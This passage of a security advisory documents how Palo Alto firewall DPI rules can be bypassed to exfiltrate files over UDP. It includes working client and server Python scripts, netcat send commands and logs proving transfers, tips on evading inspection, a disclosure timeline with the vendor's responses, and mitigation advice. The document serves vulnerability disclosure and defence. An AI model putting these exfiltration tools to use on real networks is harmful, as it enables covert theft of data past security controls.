    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 38716
    ^C
    listening on [any] 82 ...
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 46421
    ^C
    listening on [any] 82 ...
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 46280
    ^C
    listening on [any] 82 ...
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 42620
    ^C
    listening on [any] 82 ...
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 54255
    ^C
    kali-wan-server%

The client sends random data to the remote server using port 82/udp
(any random UDP port will work).

Sending random data to any remote server on port 82/udp:

    kali-lan-client% for i in $(seq 1 10); do cat /dev/urandom |
hexdump -C | nc -v -n -u 172.16.35.3 82;sleep 2;done
    (UNKNOWN) [172.16.35.3] 82 (?) open
    ^C
    (UNKNOWN) [172.16.35.3] 82 (?) open
    ^C
    (UNKNOWN) [172.16.35.3] 82 (?) open
    ^C
    (UNKNOWN) [172.16.35.3] 82 (?) open
    ^C
    (UNKNOWN) [172.16.35.3] 82 (?) open
    ^C
    (UNKNOWN) [172.16.35.3] 82 (?) open
    ^C
    (UNKNOWN) [172.16.35.3] 82 (?) open
    ^C
    (UNKNOWN) [172.16.35.3] 82 (?) open
    ^C
    (UNKNOWN) [172.16.35.3] 82 (?) open
    ^C
    (UNKNOWN) [172.16.35.3] 82 (?) open
    ^C
    kali-lan-client%

We can confirm that the remote server successfully received files from
the client:

    kali-wan-server% ls -la
    total 316
    drwxrwxr-x  2 user user  4096 Oct 24 11:11 .
    drwx------ 21 user user  4096 Oct 24 11:09 ..
    -rw-rw-r--  1 user user 32768 Oct 24 11:10 exfiltration-udp-1
    -rw-rw-r--  1 user user 32768 Oct 24 11:11 exfiltration-udp-10
    -rw-rw-r--  1 user user 32768 Oct 24 11:11 exfiltration-udp-2
    -rw-rw-r--  1 user user 32768 Oct 24 11:11 exfiltration-udp-3
    -rw-rw-r--  1 user user 32768 Oct 24 11:11 exfiltration-udp-4
    -rw-rw-r--  1 user user 32768 Oct 24 11:11 exfiltration-udp-5
    -rw-rw-r--  1 user user 32768 Oct 24 11:11 exfiltration-udp-6
    -rw-rw-r--  1 user user 32768 Oct 24 11:11 exfiltration-udp-7
    -rw-rw-r--  1 user user 32768 Oct 24 11:11 exfiltration-udp-8
    -rw-rw-r--  1 user user 32768 Oct 24 11:11 exfiltration-udp-9
    kali-wan-server%

Content of the random data (for example, exfiltration-udp-2) - found
in the Annexes.

Logs showing exfiltration of data:

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

After multiple tests, it appears that an attacker can exfiltrate files
without any filtering, with UDP datagrams (64KB each) - a PoC is
provided in the below section.

Any port can be used. For example, port 31337/udp.

Sending remote data over port 31337/udp using the previous
exfiltration-udp-2 file allowing to confirm that the file is not
modified in transit by the Palo Alto appliance:

    kali-lan-client% ls -la exfiltration-udp-2
    -rw-rw-r-- 1 user user 32768 Oct 24 16:01 exfiltration-udp-2
    kali-lan-client% sha256sum exfiltration-udp-2
    fd0c656bbe8fb0e4f97b319e74fc2b91c6a1137ad9dee00a6b24e224d90c5344
exfiltration-udp-2
    kali-lan-client% nc -v -n -u 172.16.35.3 31337 < exfiltration-udp-2
    (UNKNOWN) [172.16.35.3] 31337 (?) open
    ^C
    kali-lan-client%

Then, the remote server receives the file.

Receiving data over port 31337/udp:

    kali-wan-server% nc -l -v -n -u -p 31337 > exfiltration-udp-2
    listening on [any] 31337 ...
    connect to [172.16.35.3] from (UNKNOWN) [192.168.1.2] 37049
    ^C
    kali-wan-server% ls -la exfiltration-udp-2
    -rw-rw-r-- 1 user user 32768 Oct 24 16:03 exfiltration-udp-2
    kali-wan-server% sha256sum exfiltration-udp-2
    fd0c656bbe8fb0e4f97b319e74fc2b91c6a1137ad9dee00a6b24e224d90c5344
exfiltration-udp-2
    kali-wan-server%

The checksum matches, indicating that the file was successfully exfiltrated.

It was determined that exfiltration is due to dependencies of applications.

For example, the `ms-office365` application will import several
dependencies that will enable data exfiltration:

Dependencies automatically added:

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

The traffic is detected as it is related to the `access-to-office`
firewall rule, with incorrect amounts of exfiltrated data detected in
the logs.

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

### PoC

A complete PoC is provided, allowing to exfiltrate any amount of data:

`client.py` - will send a file over UDP datagrams and switch to a new
UDP port after sending 4 datagrams:

    kali-lan-client% ./client.py -h
    usage: client.py [-h] -f FILE -ip IP [-p PORT] [-c CHUNKSIZE] [-n
PORTNUMBER] [-s SLEEP]

    options:
      -h, --help            show this help message and exit
      -f FILE, --file FILE  file
      -ip IP                ip
      -p PORT, --port PORT  beginning port (default 31337)
      -c CHUNKSIZE, --chunksize CHUNKSIZE
                            chunk size (default 7000)
      -n PORTNUMBER, --portnumber PORTNUMBER
                            default port (default 1000)
      -s SLEEP, --sleep SLEEP
                            default sleep before using a new port (default 0)
    kali-lan-client%

[code:python]
#!/usr/bin/python

import socket, sys, time, argparse

def createsocket():
  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  return sock

def exfiltrate(port):
  f = open(file, "r")

  while True:
    s = createsocket()
    for i in range (0, 4):
      data = f.read(chunk_size)
      s.sendto(data.encode("utf-8"), (ip, port))
    s.close()
    port = port + 1
    time.sleep(sleep)
    if port > args.port + args.portnumber:
      break
  time.sleep(3)

if __name__ == "__main__":
  parser = argparse.ArgumentParser()
  parser.add_argument("-f", "--file", type=str, help="file", required=True)
  parser.add_argument("-ip", type=str, help="ip", required=True)
  parser.add_argument("-p", "--port", type=int, help="beginning port
(default 31337)", default=31337)
  parser.add_argument("-c", "--chunksize", type=int, help="chunk size
(default 7000)", default=7000)
  parser.add_argument("-n", "--portnumber", type=int, help="default
port (default 1000)", default=1000)
  parser.add_argument("-s", "--sleep", type=float, help="default sleep
before using a new port (default 0)", default=0)
  args = parser.parse_args()
  file = args.file
  ip = args.ip
  port = args.port
  port_nb = args.portnumber
  chunk_size = args.chunksize
  sleep = args.sleep
  print("file =", file)
  print("ip =", ip)
  print("port =", port)
  print("portnumber =", port_nb)
  print("chunksize =", chunk_size)
  print("sleep =", sleep)

  exfiltrate(port)
  print ("done")

[/code]

`server.py` - will create 1000 threads to listen on 1000 UDP ports and
retrieve contents sent by the client. The data received will be stored
on files whose names correspond to the udp port:

    kali-wan-server# ulimit -n 100000 && ./server.py -h
    usage: server.py [-h] [-p PORT] [-c CHUNKSIZE] [-n PORTNUMBER]

    options:
      -h, --help            show this help message and exit
      -p PORT, --port PORT  beginning port (default 31337)
      -c CHUNKSIZE, --chunksize CHUNKSIZE
                            chunk size (default 7000)
      -n PORTNUMBER, --portnumber PORTNUMBER
                            default port (default 1000)
    kali-wan-server# ulimit -n 100000 && ./server.py
    port = 31337
    portnumber = 1000
    chunksize = 7000

[code:python]
#!/usr/bin/python

import socket, threading, os, sys, argparse

UDP_IP = "0.0.0.0"

def createsocket(port):
  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  sock.bind((UDP_IP, port))
  return sock

def thread_recv(port):
  s = createsocket(port)
  f = open(str(port), "a")
  while True:
    data, b = s.recvfrom(chunk_size)
    print (port, end=" ")
    f.write(data.decode("utf-8"))
    os.fsync(f)

if __name__ == "__main__":
  parser = argparse.ArgumentParser()
  parser.add_argument("-p", "--port", type=int, help="beginning port
(default 31337)", default=31337)
  parser.add_argument("-c", "--chunksize", type=int, help="chunk size
(default 7000)", default=7000)
  parser.add_argument("-n", "--portnumber", type=int, help="default
port (default 1000)", default=1000)
  args = parser.parse_args()
  port = args.port
  port_nb = args.portnumber
  chunk_size = args.chunksize
  print("port =", port)
  print("portnumber =", port_nb)
  print("chunksize =", chunk_size)

  threads = list()
  for index in range (port, port+port_nb):
    t = threading.Thread(target=thread_recv, args=(index,))
    threads.append(t)
    t.start()
  for index, thread in enumerate(threads):
    thread.join()

[/code]

For example, in my test network, with restrictive policies:

- - `unknown-tcp` and `unknown-udp` (with the service
`application-default`) are blocked,
- - only `ms-office356` (with the service `application-default`) is allowed, and
- - everything else is blocked.

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

I generate a 10M file on `kali-lan-client` located in the LAN side of
the Palo Alto appliance.

This file contains the `hexdump -C` representation of 2M of random
data, resulting in a 10MB file. It also appears that data represented
as hexadecimal dump easily goes through Palo Alto's DPI engines.

The SHA256 checksum of the file is
`74a446b153955ce46fe3f8a0f30ab939226ec176af5ecaecc0cfa9f91108f725`:

    kali-lan-client% ls -la
    total 12
    drwx------  2 user user 4096 Oct 12 21:10 .
    drwx------ 17 user user 4096 Oct 12 21:04 ..
    -rwx------  1 user user 1459 Oct 12 21:03 client.py
    kali-lan-client% dd if=/dev/urandom bs=1M count=2 | hexdump -C > 10M
    2+0 records in
    2+0 records out
    2097152 bytes (2.1 MB, 2.0 MiB) copied, 0.458256 s, 4.6 MB/s
    kali-lan-client% ls -la
    total 10128
    drwxrwxr-x  2 user user     4096 Oct 12 21:10 .
    drwx------ 17 user user     4096 Oct 12 21:04 ..
    -rw-------  1 user user 10354697 Oct 12 21:10 10M
    -rwx------  1 user user     1459 Oct 12 21:03 client.py
    kali-lan-client% du -h 10M
    9.9M        10M
    kali-lan-client% head -n 5 10M
    00000000  87 f1 fc ba c6 15 4e 41  b0 dc 12 57 e7 31 e2 8a
|......NA...W.1..|
    00000010  00 52 68 ad 6c 7b db 5c  c5 09 8d 40 79 48 30 f0
|.Rh.l{.\...@yH0.|
    00000020  99 b8 db af cb cb af 5d  9e f2 bf 78 d2 b7 19 7e
|.......]...x...~|
    00000030  11 89 fc 37 e5 20 a0 d8  c3 74 ed 1b ea fa 5f b5  |...7.
...t...._.|
    00000040  82 5d be 39 63 a1 7d f1  f8 af 1f ed 72 02 23 50
|.].9c.}.....r.#P|
    kali-lan-client% sha256sum 10M
    74a446b153955ce46fe3f8a0f30ab939226ec176af5ecaecc0cfa9f91108f725  10M
    kali-lan-client% ./client.py -f 10M -ip 172.16.35.3 -c 65000
    file = 10M
    ip = 172.16.35.3
    port = 31337
    portnumber = 1000
    chunksize = 65000
    sleep = 0
    done
    kali-lan-client%

On the server `kali-wan-server` located in the WAN side of the Palo
Alto appliance, this file is received into multiple small parts. When
reassembled, the resulting file has the correct SHA256 checksum
`74a446b153955ce46fe3f8a0f30ab939226ec176af5ecaecc0cfa9f91108f725`
meaning exfiltration was a success:

    kali-wan-server# ls -la
    total 32
    drwxr-xr-x  2 root root 24576 Oct 12 21:08 .
    drwx------ 24 user user  4096 Oct 12 21:07 ..
    -rwx------  1 root root  1201 Oct 12 20:56 server.py
    kali-wan-server# ulimit -n 100000 && ./server.py -c 65000
    port =  31337
    portnumber =  1000
    chunksize =  65000
    31337 31337 31337 31337 31338 31338 31338 31338 31339 31339 31339
31339 31340 31340 [...]

    KeyboardInterrupt
    ^C Exception ignored in: <module 'threading' from
'/usr/lib/python3.11/threading.py'>
    Traceback (most recent call last):
      File "/usr/lib/python3.11/threading.py", line 1590, in _shutdown
        lock.acquire()
    KeyboardInterrupt:
    kali-wan-server# ls -la
    total 10228
    drwx------  2 root root  24576 Oct 12 21:11 .
    drwx------ 24 user user   4096 Oct 12 21:07 ..
    -rw-------  1 root root 260000 Oct 12 21:11 31337
    -rw-------  1 root root 260000 Oct 12 21:11 31338
    -rw-------  1 root root 260000 Oct 12 21:11 31339
    -rw-------  1 root root 260000 Oct 12 21:11 31340
    -rw-------  1 root root 260000 Oct 12 21:11 31341
    -rw-------  1 root root 260000 Oct 12 21:11 31342
    -rw-------  1 root root 260000 Oct 12 21:11 31343
    -rw-------  1 root root 260000 Oct 12 21:11 31344
    [...]
    -rw-------  1 root root      0 Oct 12 21:11 32332
    -rw-------  1 root root      0 Oct 12 21:11 32333
    -rw-------  1 root root      0 Oct 12 21:11 32334
    -rw-------  1 root root      0 Oct 12 21:11 32335
    -rw-------  1 root root      0 Oct 12 21:11 32336
    -rwx------  1 root root   1201 Oct 12 20:56 server.py
    kali-wan-server# cat 3* > 10M_exfiltrated
    kali-wan-server# sha256sum 10M_exfiltrated
    74a446b153955ce46fe3f8a0f30ab939226ec176af5ecaecc0cfa9f91108f725
10M_exfiltrated
    kali-wan-server#

In the logs, we can see that the datagrams went through.

The following screenshot shows that 260,2k byte-sized communications
were allowed for the UDP ports used by the PoC (because the chunk size
was 65000 during the test, using `-c 65000`: 4 datagrams of 65000 =
260000 bytes = 253,9 kbytes and I guess that the additional 6440 bytes
correspond to the header overheads since the datagrams were
fragmented):

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

And the latest communications (with 240 bytes detected by the
appliance) were also allowed - the file was already fully transferred:

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

Using Wireshark on the receiving server, we can see that UDP datagrams
were fragmented:

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

[please use the HTML version at
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html]

I ran some tests with bigger files (200MB) and achieved the speed of
600Mbps of data exfiltrated on the remote server (likely limited by
the test hardware) with a datagram size of 65,000 bytes (and a MTU of
1,500 bytes).

    kali-wan-server% slurm -i eth0
                          -= slurm 0.4.4 on kali-wan-server =-


       x
     x                                 xxxx       x  xx
 x  xxxx
     xx                                xxxxx     xxxxxx
xxxxxxxxx
     xx                           xx  xxxxxx    xxxxxxx
xxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
                                              x x x
x  xx
                                                  x
   x
                                                  x
   x
                                                                          x



          Active Interface: eth0                    Interface Speed: 1000 Mbit/s

          Current RX Speed: 70271.63 KB/s          Current TX Speed:
9.42 KB/s
        Graph Top RX Speed: 74681.16 KB/s        Graph Top TX Speed:
20.85 KB/s
      Overall Top RX Speed: 74681.16 KB/s      Overall Top TX Speed:
20.85 KB/s
          Received Packets: 6769372             Transmitted Packets:
348814
           GBytes Received: 9.015 GB             GBytes Transmitted:
0.312 GB
       Errors on Receiving:   0              Errors on Transmission: 0


Obviously, using UDP datagrams with a size of 65,000 bytes is not
possible on the Internet because they will be fragmented into a
multitude of small packets and such datagram size is likely to be
dropped by routers. From my tests, over the Internet, datagrams with a
size of 7,000 bytes usually go through with a speed of ~ 100Mbps
without limits. It appears that some hosting companies will drop UDP
floods. Therefore, I added the `--sleep` option in the `client.py` PoC
to wait milliseconds before switching to a new UDP port.

With a 15MB file sent over the Internet (a sleep of 10ms is used when
switching to a new UDP port, artificialy limiting the throughput):

    kali% ls -la
    total 4
    drwxr-xr-x  2 root root   60 Feb 13 10:04 .
    drwxrwxrwt 26 root root 1660 Feb 13 09:10 ..
    -rwx------  1 root root 1465 Feb 13 10:03 client.py
    kali% dd if=/dev/urandom bs=1M count=3 | hexdump -C > 15M
    3+0 records in
    3+0 records out
    3145728 bytes (3.1 MB, 3.0 MiB) copied, 0.625271 s, 5.0 MB/s
    kali% ls -la
    total 15176
    drwxr-xr-x  2 root root       80 Feb 13 10:04 .
    drwxrwxrwt 26 root root     1660 Feb 13 09:10 ..
    -rw-------  1 root root 15532041 Feb 13 10:04 15M
    -rwx------  1 root root     1465 Feb 13 10:03 client.py
    kali% du -h 15M
    15M 15M
    kali% sha256sum 15M
    2463d436d3bf720091a6d18138b308ba9e7c41aab42ed76639dc3cc17387c7b4  15M
    kali% ./client.py -f 15M -ip [redacted] -c 7000 -p 30000 -s 0.01
    file = 15M
    ip = [redacted]
    port = 30000
    portnumber = 1000
    chunksize = 7000
    sleep = 0.01
    done
    kali%

On the remote server, the file is received:

    server# ulimit -n 100000 && ./server.py -c 7000 -p 30000 -n 1000
    port =  30000
    portnumber =  1000
    chunksize =  7000
    30000 30000 30000 30000 30001 30001 30001 30001 30002 30002 30002
30002 30003 30003 30003 30003 30004 30004 30004 30004 30005 30005
30005 30005 30006 30006 30006 30006 30007 30007 30007 30007 30008
30008 30008 30008 30009 30009 30009 30009 30010 30010 30010 30010
30011 30011 30011 30011 30012 30012 30012 30012 30013 30013 30013
30013 30014 30014 30014 30014 30015 30015 30015 30015 30016 30016
30016 30016 30017 30017 30017 30017 30018 30018 30018 30018 30019
30019 30019 30019 30020 30020 30020 30020 30021 30021 30021 30021
30022 30022 30022 30022 30023 30023 30023 30023 30024 30024 30024
30024 30025 30025 30025 30025 30026 30026 30026 30026 30027 30027
30027 30027 30028 30028 30028 30028 30029 30029 30029 30029 30030
30030 30030 30030 30031 30031 30031 30031 30032 30032 30032 30032
30033 30033 30033 30033 30034 30034 30034 30034 30035 30035 30035
30035 30036 30036 30036 [...]
    ^C
    server# du -h
    15M .
    server# ls -la | head
    total 13316
    drwx------ 2 root root 20060 Feb 13 18:09 .
    drwxrwxrwt 3 root root    60 Feb 13 17:38 ..
    -rw------- 1 root root 21000 Feb 13 18:09 30000
    -rw------- 1 root root 21000 Feb 13 18:09 30001
    -rw------- 1 root root 21000 Feb 13 18:09 30002
    -rw------- 1 root root 21000 Feb 13 18:09 30003
    -rw------- 1 root root 21000 Feb 13 18:09 30004
    -rw------- 1 root root 21000 Feb 13 18:09 30005
    -rw------- 1 root root 21000 Feb 13 18:09 30006
    server# cat 3*|sha256sum
    2463d436d3bf720091a6d18138b308ba9e7c41aab42ed76639dc3cc17387c7b4  -
    server#

With tcpdump, we can confirm that the file is being transferred over UDP:

    server# tcpdump -n -i eth0 udp
    [...]
    18:09:53.814557 IP [redacted]2 > [redacted]: ip-proto-17
    18:09:53.814558 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814558 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814558 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814558 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814558 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814558 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814558 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814600 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814600 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814600 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814600 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814600 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814600 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814600 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814600 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.814855 IP [redacted].60614 > [redacted].30071: UDP, length 7000
    18:09:53.814855 IP [redacted].60614 > [redacted].30071: UDP, length 7000
    18:09:53.814855 IP [redacted].60614 > [redacted].30071: UDP, length 7000
    18:09:53.814855 IP [redacted].60614 > [redacted].30071: UDP, length 7000
    18:09:53.825361 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.825361 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.825362 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.825362 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.825390 IP [redacted] > [redacted]: ip-proto-17
    18:09:53.825390 IP [redacted] > [redacted]: ip-proto-17
    [...]

During this transfer, I saw a 20Mbps speed due to the use of a sleep
of 10ms when switching to a new UDP port:

    server% slurm -i eth0
                               -= slurm 0.4.3 on server =-

     x
     xxxx
     xxxx
     xxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     x                                                      x x
     x
     x
     x



          Active Interface: eth0                    Interface Speed: unknown

          Current RX Speed: 2580.04 KB/s           Current TX Speed:
10.32 KB/s
        Graph Top RX Speed: 2580.04 KB/s         Graph Top TX Speed:
10.32 KB/s
      Overall Top RX Speed: 2580.04 KB/s       Overall Top TX Speed:
10.32 KB/s
          Received Packets: 205380              Transmitted Packets:
30023
           MBytes Received: 243.647 MB           MBytes Transmitted:
10.926 MB
       Errors on Receiving: 0                Errors on Transmission: 0




Without a sleep of 10ms when a new UDP port is used, I saw a speed of
10518KB/s speed (~ 84Mbps). However, some packets will be missing on
the receiving server.

                           -= slurm 0.4.4 on server =-

                 x
                 x                                            x
                 x                                            x
                 x             x                              x
     
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
                        x                             x
                        x                             x
                        x                             x
                        x



          Active Interface: eth0                    Interface Speed: 1000 Mbit/s

          Current RX Speed: 0.12 KB/s              Current TX Speed:
0.47 KB/s
        Graph Top RX Speed: 10518.66 KB/s        Graph Top TX Speed:
58.17 KB/s
      Overall Top RX Speed: 10518.66 KB/s      Overall Top TX Speed:
58.17 KB/s
          Received Packets: 9678138             Transmitted Packets:
354087
           GBytes Received: 13.049 GB            GBytes Transmitted:
0.313 GB
       Errors on Receiving: 0                Errors on Transmission: 0

Note that, because UDP is used, it happens that datagrams are lost (in
a LAN, I receive between 99.999% and 100% of the datagrams), but the
results may differ on the Internet. The use of a timer (10ms, 5ms)
when switching UDP ports will strongly limit packet loss.

- From my tests, it is possible to exfiltrate a huge quantity of data.

Finally, regarding the choice of using a hexadecimal version of files:
representation with `hexdump -C` was used to identify potential
missing/blocked transferred data during the tests. The fact that UDP
also may arrive in different order is partially solved using hexdump
representation (thanks to the address of the content). Also,
surprisingly, hexadecimal-encoded data tends to pass very easily
through DPI engines of Palo Alto:

    kali-lan-client% head -n 10 25M
    00000000  df ac e4 18 02 be 72 dd  1b 80 d2 19 24 fa 10 25
|......r.....$..%|
    00000010  b7 b7 ae 98 45 d4 3f d9  21 27 7f 5e a6 e7 09 1f
|....E.?.!'.^....|
    00000020  10 28 af a7 1f 4b 43 2d  2e 17 dd d9 11 9b d5 3e
|.(...KC-.......>|
    00000030  dc d2 a7 5d 4b eb 83 05  b0 ea 73 48 61 1d ac 56
|...]K.....sHa..V|
    00000040  a7 c3 56 83 da 0f b1 57  4f de 39 30 96 e6 bd 21
|..V....WO.90...!|
    00000050  a9 84 f3 01 80 8a b3 0f  66 11 2b d5 7e 94 7a 07
|........f.+.~.z.|
    00000060  f8 11 ba 5a 16 e9 7c b7  90 83 28 3f 85 e5 22 ff
|...Z..|...(?..".|
    00000070  da 41 af 63 fc 6f af 63  ed d2 ab c6 21 c2 54 8b
|.A.c.o.c....!.T.|
    00000080  98 fd e7 dd 10 75 ba a2  28 56 c7 40 a4 ba 6d ee
|.....u..(V.@..m.|
    00000090  25 3c 83 5c 5f 80 a0 47  66 7c d2 e8 96 03 a4 be
|%<.\_..Gf|......|

### Risk

Threat actors can exfiltrate data without any filtering.

### Recommendation

There are vulnerabilities inside the `default-application` service in
Palo Alto firewalls when using a specific application (Palo Alto
wording for available Deep Packet Inspection mechanisms), allowing an
attacker to transmit any data to the Internet. The application linked
to the `default-application` service provides information to the Deep
Packet Inspection (DPI) mechanisms implemented in the
`default-application` service to block any unwanted traffic.

Any rule based on the `default-application` service (e.g. access to
websites) with a specific application without a destination address is
vulnerable to data exfiltration.

Do not use DPI-based rules.

In the firewall rules, always specify the IPv4 and IPv6 addresses of
the remote services that you want to allow.



## Report Timeline

* 2023 - 2024: Reported several HTTP/HTTPS DPI bypasses to the Palo
Alto support (different from those indicated in this security
advisory). On September 2024, the support finally provided me with
workarounds with 10 options in "Suspicious HTTP Evasion Detection" and
"Suspicious TLS Evasion Found" to set to drop in order to block these
bypasses.
* Oct 2024: Security assessment performed on "standard" DPI firewall
rules implemented on Palo Alto PanOS.
* Nov 4, 2024: Sent a complete report to Palo Alto PSIRT.
* Nov 7, 2024: Asked for an update.
* Nov 14, 2024: Palo Alto PSIRT acknowledged the reception of the
security assessment and confirmed that the behavior is normal due to
"insufficient-data" (as shown in the screenshots found in the report),
and provided me with links to the palo alto website and the following
explanation:

> The behavior described in the report is not considered a vulnerability, since 
> it does not impact the confidentiality, integrity, or availability of the 
> system or downstream systems, and therefore it does not meet the criteria to 
> assign a CVE. There are multiple proactive measures that are available to 
> reduce the likelihood of exfiltration. These include:

> - creating security policies that specify both the source and destination IP 
> addresses in the policy, including the use of EDLs for SaaS type services,

> - using auto-tagging to tag source IPs with insufficient-data/unknown 
> sessions, which can then be added to a dynamic access group for use in a 
> policy, such as an authentication policy,

> - using authentication policies as additional barriers to malicious activity, 
> and

> - configuring DNS Sinkholing for suspicious domains.

* Nov 15, 2024: Asked clarification regarding the allowed amount of
exfiltrated data, since the official documentation
(https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000ClIgCAK)
indicates that the appliance will "Wait for a maximum of 4 packets or
2000 bytes of data in either direction (not including the TCP
handshake)". I confirmed from my observation that, I was able to
exfiltrate more data in UDP and in TCP. I asked if they replicated the
tests.
* Nov 25, 2024: Sent a follow-up email.
* Nov 26, 2024: Palo Alto provided the same 4 previous workarounds and
said I should recontact them after trying these mitigations.
* Dec 6, 2024: I confirmed to Palo Alto PSIRT that the 4 workarounds
they previously indicated do not work: tcp packets and udp datagrams
are not blocked even with denied unknown-tcp and unknown-udp denied
policy at the top of the rules - I was able to exfiltrate up to 40KBs
in TCP and UDP in 1 network flow. I again asked if they tested the
PoCs. I also said that these vulnerabilities may be elligible to CVEs.
If network flows are not blocked by the firewall while they were
supposed to be blocked, this looks like a vulnerability. We can find
previous CVEs corresponding to firewalls letting packets through, for
example CVE-2019-5598.
* Dec 9, 2024: Palo Alto PSIRT said they would forward the report to
the product team.
* Jan 13, 2025: Asked for an update.
* Jan 15, 2025: Palo Alto PSIRT provided me with the final analysis.
* Feb 11, 2025: I asked Palo Alto PSIRT more details regarding the
official analysis.
* Mar 13, 2025: Palo Alto PSIRT provided me with the official statement:

> Reports 1 & 2:
> Our firewall is designed to optimize user experience and minimize disruption. 
> If the firewall encounters HTTP traffic it cannot confidently identify (e.g., 
> Facebook, Reddit), the request is not automatically dropped to avoid false 
> positives and unintended performance issues.
>
> If you'd like to explore an option to drop unidentified traffic, you're 
> welcome to submit a feature request through our support team: 
> https://support.paloaltonetworks.com.
>
> Report 3:
> The firewall requires a certain number of packets for inspection before 
> setting the App-ID to unknown-udp. For rules involving apps with udp/dynamic 
> as their default, the firewall waits until an App-ID is determined before 
> taking action. In this case, the UDP packet count fell below the threshold, 
> so the App-ID remained insufficient-data, and the session was not dropped.
>
> If you'd like the flexibility to adjust this packet threshold, you can submit 
> a feature request through our support team: 
> https://support.paloaltonetworks.com.
>
> Security Classification:
> Since these reports reflect feature requests rather than product defects, 
> they do not qualify as security vulnerabilities under PAN-OS guidelines. We 
> follow CVE Numbering Authority (CNA) Operational Rules to define 
> vulnerabilities. Specifically, rule 4.1.7 states:
>
> "Detection bypass attacks SHOULD NOT be determined to be vulnerabilities 
> unless a product explicitly claims to detect a specific pattern and fails to 
> do so."
>
> Since PAN-OS does not explicitly claim to detect the reported behaviors, this 
> scenario does not meet the criteria for a CVE-classified vulnerability.

* Mar 31, 2025: A security advisory is published.




## Credits

These vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec).



## References
https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html
https://pierrekim.github.io/advisories/2025-palo-alto-dpi.txt



## Annexes

### Example payload for the Exfiltration of data using TCP and 80/tcp to any IP

This example payload was generated using `dd` and `hexdump -C` (e.g.:
`dd if=/dev/urandom bs=1M count=1 | hexdump -C > rand.hex`).

    kali-lan-client# sha256 rand.hex
    fa0666341096d42e263a023f57714f45034eebf02e338a3b837a3b29ba10562f  rand.hex

    kali-lan-client# base64 rand.hex
    MDAwMDAwMDAgIDhlIDAzIDA3IDRiIDhjIGU2IDE3IDAwICA1MiAxZCA4NCA3NSBlNCBmYSA0
    OSA3NiAgfC4uLksuLi4uUi4udS4uSXZ8CjAwMDAwMDEwICAyZiBlMSBiNiA0NCAxYSA1ZiA4
    NiA5NSAgYTAgZmUgOTEgZjYgZDAgMGMgMTkgNTIgIHwvLi5ELl8uLi4uLi4uLi5SfAowMDAw
    MDAyMCAgMTUgMjUgNjUgOWMgMjMgMjAgOTYgMzQgIDM1IDk1IDE2IGY0IGQzIGJmIGM2IDUw
    ICB8LiVlLiMgLjQ1Li4uLi4uUHwKMDAwMDAwMzAgIDdlIGM2IDJiIGM2IDcwIDE5IDFkIGNh
    ICA5MCBiOCBkNSBlZiBhOCBlNyBkMiBhZCAgfH4uKy5wLi4uLi4uLi4uLi58CjAwMDAwMDQw
    ICA4YyA5MyBmNiBlYSA4ZCBiMCA0YyBkZiAgZWQgMjggNzkgZTkgMTcgNWQgZTcgNjcgIHwu
